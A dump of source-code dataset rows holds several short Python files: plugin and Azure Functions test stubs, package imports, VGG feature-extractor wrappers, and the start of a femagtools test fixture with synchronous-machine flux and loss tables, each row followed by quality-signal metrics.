hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
de893056369fb071b7b2c09dad1e3929103c3caa
| 28
|
py
|
Python
|
test-packages/package-test-plugins/testplugin/foo/__init__.py
|
EvanPlettGML/straight.plugin
|
0b505f6a4be862289b18a822ad467f512e3dbab2
|
[
"MIT"
] | 72
|
2015-02-13T21:16:38.000Z
|
2022-02-22T12:48:26.000Z
|
test-packages/package-test-plugins/testplugin/foo/__init__.py
|
EvanPlettGML/straight.plugin
|
0b505f6a4be862289b18a822ad467f512e3dbab2
|
[
"MIT"
] | 15
|
2015-05-07T21:52:58.000Z
|
2022-02-25T15:39:19.000Z
|
test-packages/package-test-plugins/testplugin/foo/__init__.py
|
EvanPlettGML/straight.plugin
|
0b505f6a4be862289b18a822ad467f512e3dbab2
|
[
"MIT"
] | 10
|
2015-02-13T21:16:40.000Z
|
2021-08-12T20:47:51.000Z
|
def do(i):
return i + 2
| 9.333333
| 16
| 0.5
| 6
| 28
| 2.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.357143
| 28
| 2
| 17
| 14
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
dea2d72528a7b1e2958f4b13b4f02337b95803ce
| 135
|
py
|
Python
|
tests/unittests/eventhub_mock_functions/eventhub_trigger_iot/__init__.py
|
yojagad/azure-functions-python-worker
|
d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9
|
[
"MIT"
] | null | null | null |
tests/unittests/eventhub_mock_functions/eventhub_trigger_iot/__init__.py
|
yojagad/azure-functions-python-worker
|
d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9
|
[
"MIT"
] | null | null | null |
tests/unittests/eventhub_mock_functions/eventhub_trigger_iot/__init__.py
|
yojagad/azure-functions-python-worker
|
d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9
|
[
"MIT"
] | null | null | null |
import json
import azure.functions as func
def main(event: func.EventHubEvent) -> str:
return json.dumps(event.iothub_metadata)
| 16.875
| 44
| 0.762963
| 19
| 135
| 5.368421
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 135
| 7
| 45
| 19.285714
| 0.886957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a0fc6223dfde9c2536f568e7aebe009e4dd9023d
| 80
|
py
|
Python
|
hwrt/segmentation/__init__.py
|
MartinThoma/hwrt
|
7b274fa3022292bb1215eaec99f1826f64f98a07
|
[
"MIT"
] | 65
|
2015-04-08T12:11:22.000Z
|
2022-02-28T23:46:53.000Z
|
hwrt/segmentation/__init__.py
|
MartinThoma/hwrt
|
7b274fa3022292bb1215eaec99f1826f64f98a07
|
[
"MIT"
] | 35
|
2015-01-05T11:56:30.000Z
|
2022-03-12T00:55:38.000Z
|
hwrt/segmentation/__init__.py
|
MartinThoma/hwrt
|
7b274fa3022292bb1215eaec99f1826f64f98a07
|
[
"MIT"
] | 18
|
2015-01-19T15:57:25.000Z
|
2021-02-15T20:38:32.000Z
|
# Local modules
from .beam import * # noqa
from .segmentation import * # noqa
| 20
| 35
| 0.7
| 10
| 80
| 5.6
| 0.7
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2125
| 80
| 3
| 36
| 26.666667
| 0.888889
| 0.2875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
19b60c4867764c21d9ac43613d8d9da9c1fe38a4
| 42
|
py
|
Python
|
cride/rides/models/__init__.py
|
sgg10/cride
|
e241028430656c54aa0133a173efad656cab233d
|
[
"MIT"
] | null | null | null |
cride/rides/models/__init__.py
|
sgg10/cride
|
e241028430656c54aa0133a173efad656cab233d
|
[
"MIT"
] | null | null | null |
cride/rides/models/__init__.py
|
sgg10/cride
|
e241028430656c54aa0133a173efad656cab233d
|
[
"MIT"
] | null | null | null |
from .rides import *
from .rating import *
| 21
| 21
| 0.738095
| 6
| 42
| 5.166667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 2
| 21
| 21
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
19fc75b0a5fb22956679040f4b3981cf267fcb4c
| 97
|
py
|
Python
|
terrascript/local/__init__.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 4
|
2022-02-07T21:08:14.000Z
|
2022-03-03T04:41:28.000Z
|
terrascript/local/__init__.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/local/__init__.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 2
|
2022-02-06T01:49:42.000Z
|
2022-02-08T14:15:00.000Z
|
# terrascript/local/__init__.py
import terrascript
class local(terrascript.Provider):
pass
| 13.857143
| 34
| 0.783505
| 11
| 97
| 6.545455
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134021
| 97
| 6
| 35
| 16.166667
| 0.857143
| 0.298969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
c249fa52df5f80ff10569b24b519bf611598e546
| 1,236
|
py
|
Python
|
trainable/features/vgg.py
|
hiltonjp/trainable
|
3b1432c9c816285680f14e292eaef26cdbe213cf
|
[
"MIT"
] | 1
|
2018-12-17T19:38:00.000Z
|
2018-12-17T19:38:00.000Z
|
trainable/features/vgg.py
|
hiltonjp/trainable
|
3b1432c9c816285680f14e292eaef26cdbe213cf
|
[
"MIT"
] | null | null | null |
trainable/features/vgg.py
|
hiltonjp/trainable
|
3b1432c9c816285680f14e292eaef26cdbe213cf
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
from torchvision.models import vgg19
class AvgPoolVGG(nn.Module):
"""AvgPoolVGG(vgg=torchvision.models.vgg19)
A pretrained average-pooling vgg model for feature matching.
Args:
vgg: Any of the vgg models in torchvision.models
"""
def __init__(self, vgg=vgg19):
super().__init__()
self.vgg = vgg(pretrained=True).features
for m in self.vgg.children():
if isinstance(m, nn.MaxPool2d):
m = nn.AvgPool2d(kernel_size=2, stride=2)
def to(self, device):
self.vgg = self.vgg.to(device)
return self
def children(self):
return self.vgg.children()
def forward(self, x):
return self.vgg(x)
class VGG(nn.Module):
"""VGG(vgg=torchvision.models.vgg19)
A pretrained vgg model for feature matching.
Args:
vgg: Any of the vgg models in torchvision.models
"""
def __init__(self, vgg=vgg19):
super().__init__()
self.vgg = vgg(pretrained=True).features
def to(self, device):
self.vgg = self.vgg.to(device)
return self
def children(self):
return self.vgg.children()
def forward(self, x):
return self.vgg(x)
| 22.472727
| 64
| 0.615696
| 163
| 1,236
| 4.564417
| 0.282209
| 0.122312
| 0.05914
| 0.067204
| 0.744624
| 0.744624
| 0.647849
| 0.647849
| 0.647849
| 0.647849
| 0
| 0.015573
| 0.272654
| 1,236
| 54
| 65
| 22.888889
| 0.812013
| 0.244337
| 0
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.296296
| false
| 0
| 0.074074
| 0.148148
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
5f01e6938efa16cd1ab412e943b67f60ccdad452
| 83,510
|
py
|
Python
|
tests/test_sm.py
|
dapu/femagtools
|
95eaf750adc2013232cdf482e523b3900ac6eb08
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_sm.py
|
dapu/femagtools
|
95eaf750adc2013232cdf482e523b3900ac6eb08
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_sm.py
|
dapu/femagtools
|
95eaf750adc2013232cdf482e523b3900ac6eb08
|
[
"BSD-2-Clause"
] | null | null | null |
import femagtools.machine.sm
import pathlib
import pytest
import numpy as np
@pytest.fixture
def sm():
smpars = {"m": 3, "p": 3, "r1": 0.01, "r2": 40, "rotor_mass": 9.941, "kfric_b": 1,
"ldq": [
{"ex_current": 0.6, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.01742, 0.016110000000000003, 0.009824, 0.006978999999999999, 0.005565, 0.004614],
[0.01742, -0.001185, -0.01436, -0.02008, -
0.02327, -0.025310000000000003],
[0.01742, -0.01786, -0.03719, -
0.04475, -0.04863, -0.05114],
[0.01742, -0.03233, -0.057390000000000004, -
0.06627999999999999, -0.07052, -0.07322999999999999],
[0.01742, -0.043379999999999995, -
0.07287, -0.08267, -0.08713, -0.09005],
[0.01742, -0.05027, -0.08158, -0.09125, -
0.09601, -0.09913999999999999],
[0.01742, -0.0526, -0.08425, -0.09426000000000001, -
0.09928000000000001, -0.10250000000000001],
[0.01742, -0.05027, -0.08158, -0.09124, -
0.09602000000000001, -0.09913999999999999],
[0.01742, -0.043379999999999995, -
0.07287, -0.08267, -0.08713, -0.09005],
[0.01742, -0.03233, -0.057390000000000004, -
0.06631000000000001, -0.07053, -0.07322000000000001],
[0.01742, -0.01786, -0.0372, -
0.04476, -0.04864, -0.05115],
[0.01742, -0.001187, -0.014369999999999999, -
0.02009, -0.023289999999999998, -0.025339999999999998],
[0.01742, 0.016110000000000003, 0.009824, 0.006978999999999999, 0.005565, 0.004614]],
"psiq": [[-0.0, -0.054009999999999996, -0.07958, -0.08945, -0.09473, -0.09842],
[-0.0, -0.0535, -0.07868, -0.08764000000000001, -
0.09232, -0.09562000000000001],
[-0.0, -0.04835, -0.07146, -0.07928, -
0.08334, -0.08610999999999999],
[-0.0, -0.0395, -0.05795, -0.06421, -0.06738, -0.0697],
[-0.0, -0.0279, -0.04025, -0.04434, -
0.046490000000000004, -0.04808],
[-0.0, -0.01442, -0.02121, -
0.02393, -0.0252, -0.02606],
[-0.0, -2.436e-09, -3.6289999999999998e-09, -
4.147e-09, -4.377e-09, -4.526e-09],
[0.0, 0.01442, 0.02122, 0.02393, 0.02521, 0.02606],
[0.0, 0.0279, 0.04025, 0.04435,
0.046490000000000004, 0.04808],
[0.0, 0.0395, 0.05795,
0.06423000000000001, 0.06737, 0.06969],
[0.0, 0.04835, 0.07146,
0.07927000000000001, 0.08333, 0.08614],
[0.0, 0.05351, 0.07867, 0.08764000000000001,
0.09234, 0.09562000000000001],
[0.0, 0.054009999999999996, 0.07958, 0.08946, 0.09472, 0.09842]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[8.197, 75.66, 156.9, 194.6, 215.5, 230.4],
[8.197, 69.25, 156.7,
196.2, 217.9, 233.2],
[8.197, 64.62, 159.3,
200.4, 223.0, 238.5],
[8.197, 62.86, 160.6,
203.5, 225.6, 241.0],
[8.197, 63.39, 166.5,
211.4, 233.0, 247.6],
[8.197, 64.48, 171.1,
214.8, 238.2, 254.1],
[8.197, 64.97, 171.2,
215.8, 239.8, 255.1],
[8.197, 64.48, 171.1,
214.8, 238.2, 254.1],
[8.197, 63.39, 166.5,
211.4, 233.0, 247.6],
[8.197, 62.86, 160.7,
203.7, 225.6, 240.8],
[8.197, 64.62, 159.3,
200.4, 222.9, 238.7],
[8.197, 69.26, 156.7,
196.2, 217.9, 233.3],
[8.197, 75.67, 156.8, 194.7, 215.4, 230.4]],
"stteeth_eddy": [[6.687, 54.45, 100.3, 120.1, 130.1, 137.6],
[6.687, 52.21, 101.1,
121.3, 132.6, 141.3],
[6.687, 48.9, 103.5,
126.2, 139.2, 148.4],
[6.687, 45.99, 100.8,
122.9, 135.0, 143.3],
[6.687, 44.42, 97.99,
120.7, 134.1, 144.6],
[6.687, 43.65, 99.45,
124.9, 141.3, 154.0],
[6.687, 43.46, 99.42,
126.1, 144.4, 157.6],
[6.687, 43.64, 99.46,
124.9, 141.3, 153.9],
[6.687, 44.41, 97.98,
120.7, 134.1, 144.6],
[6.687, 45.98, 100.8,
122.7, 135.0, 143.3],
[6.687, 48.9, 103.5,
126.2, 139.3, 148.5],
[6.687, 52.21, 101.0,
121.4, 132.7, 141.2],
[6.687, 54.43, 100.3, 120.1, 130.1, 137.7]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[0.3769, 6.4, 14.11, 18.25, 20.99, 22.32],
[0.3769, 5.917, 13.88,
18.37, 20.87, 22.41],
[0.3769, 5.464, 14.42,
19.08, 21.71, 23.22],
[0.3769, 5.232, 15.54,
20.82, 23.38, 26.2],
[0.3769, 5.059, 15.47,
20.76, 23.82, 25.47],
[0.3769, 4.962, 15.0,
20.38, 24.05, 27.33],
[0.3769, 4.912, 12.52,
17.07, 20.49, 24.37],
[0.3769, 4.963, 15.0,
20.37, 24.06, 27.32],
[0.3769, 5.059, 15.46,
20.74, 23.85, 25.43],
[0.3769, 5.234, 15.53,
20.75, 23.33, 26.2],
[0.3769, 5.463, 14.42,
19.07, 21.68, 23.24],
[0.3769, 5.919, 13.88,
18.4, 20.83, 22.37],
[0.3769, 6.462, 14.12, 18.2, 20.95, 22.31]]}},
{"ex_current": 1.03, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.0297, 0.02682, 0.01684, 0.01196, 0.009485, 0.007888000000000001],
[0.0297, 0.01019, -0.0073620000000000005, -
0.01527, -0.01956, -0.022269999999999998],
[0.0297, -0.005846, -0.03052, -
0.040299999999999996, -0.04537, -0.04858],
[0.0297, -0.02028, -0.05113, -0.06227, -
0.06759, -0.07089000000000001],
[0.0297, -0.03148, -0.06805, -
0.08004, -0.08542, -0.08876],
[0.0297, -0.03852, -0.07833999999999999, -
0.08996, -0.09525, -0.09856999999999999],
[0.0297, -0.040920000000000005, -0.08159000000000001, -
0.09318, -0.09875999999999999, -0.1021],
[0.0297, -0.03853, -0.07833999999999999, -
0.08996, -0.09526, -0.09856999999999999],
[0.0297, -0.03148, -0.06806, -0.08004, -
0.08542, -0.08876999999999999],
[0.0297, -0.02028, -0.05113, -0.06227, -
0.0676, -0.07089000000000001],
[0.0297, -0.005847, -0.030529999999999998, -
0.04029, -0.045380000000000004, -0.04858],
[0.0297, 0.01018, -0.007365999999999999, -
0.01528, -0.01956, -0.02228],
[0.0297, 0.02682, 0.01684, 0.01196, 0.009485, 0.007888000000000001]],
"psiq": [[-0.0, -0.05167, -0.07825, -0.08894, -0.09447, -0.09825],
[-0.0, -0.05205, -0.07887000000000001, -
0.08817, -0.09287, -0.09615],
[-0.0, -0.04817, -0.07313, -0.08093, -
0.08467000000000001, -0.0872],
[-0.0, -0.03965, -0.06105000000000001, -
0.06696, -0.06960999999999999, -0.07155],
[-0.0, -0.02809, -0.04306, -
0.04673, -0.04835, -0.04958],
[-0.0, -0.01454, -0.02249, -0.024869999999999996, -
0.025970000000000003, -0.02667],
[-0.0, -2.457e-09, -3.8249999999999995e-09, -
4.278e-09, -4.487999999999999e-09, -4.612e-09],
[0.0, 0.01454, 0.02249, 0.024869999999999996,
0.025970000000000003, 0.026650000000000004],
[0.0, 0.02809, 0.04306, 0.04673,
0.04835, 0.049589999999999995],
[0.0, 0.03965, 0.06105000000000001,
0.06696, 0.06960999999999999, 0.07156],
[0.0, 0.04817, 0.07312, 0.08091, 0.08466, 0.0872],
[0.0, 0.05205, 0.07887000000000001,
0.08815, 0.09288, 0.09612000000000001],
[0.0, 0.05168, 0.07824, 0.08895, 0.09448, 0.09825999999999999]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[22.27, 80.33, 156.3, 194.8, 215.8, 230.6],
[22.27, 68.29, 153.9,
194.4, 216.4, 232.0],
[22.27, 58.94, 155.4,
198.6, 221.6, 237.4],
[22.27, 50.72, 155.8,
200.7, 223.6, 239.5],
[22.27, 45.71, 157.2,
207.0, 230.4, 245.6],
[22.27, 43.44, 161.4,
211.4, 236.4, 252.9],
[22.27, 42.82, 162.3,
212.5, 238.4, 254.3],
[22.27, 43.44, 161.4,
211.5, 236.4, 253.1],
[22.27, 45.71, 157.2,
207.0, 230.4, 245.7],
[22.27, 50.72, 155.8,
200.7, 223.7, 239.5],
[22.27, 58.94, 155.5,
198.5, 221.5, 237.4],
[22.27, 68.29, 153.8,
194.4, 216.5, 232.0],
[22.27, 80.33, 156.3, 194.7, 215.8, 230.7]],
"stteeth_eddy": [[17.97, 56.89, 100.4, 120.9, 130.8, 138.0],
[17.97, 52.94, 99.69,
120.4, 131.9, 140.1],
[17.97, 49.03, 103.1,
125.6, 138.6, 147.7],
[17.97, 43.49, 103.1,
124.9, 136.2, 144.1],
[17.97, 39.08, 98.0,
120.7, 132.5, 143.1],
[17.97, 36.62, 97.78,
124.5, 141.1, 154.3],
[17.97, 35.85, 98.37,
126.6, 145.1, 158.8],
[17.97, 36.61, 97.78,
124.5, 141.2, 154.2],
[17.97, 39.07, 98.0,
120.7, 132.5, 143.1],
[17.97, 43.48, 103.1,
124.8, 136.2, 144.0],
[17.97, 49.02, 103.1,
125.6, 138.6, 147.8],
[17.97, 52.93, 99.67,
120.4, 131.9, 140.3],
[17.97, 56.92, 100.4, 120.9, 130.8, 138.1]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
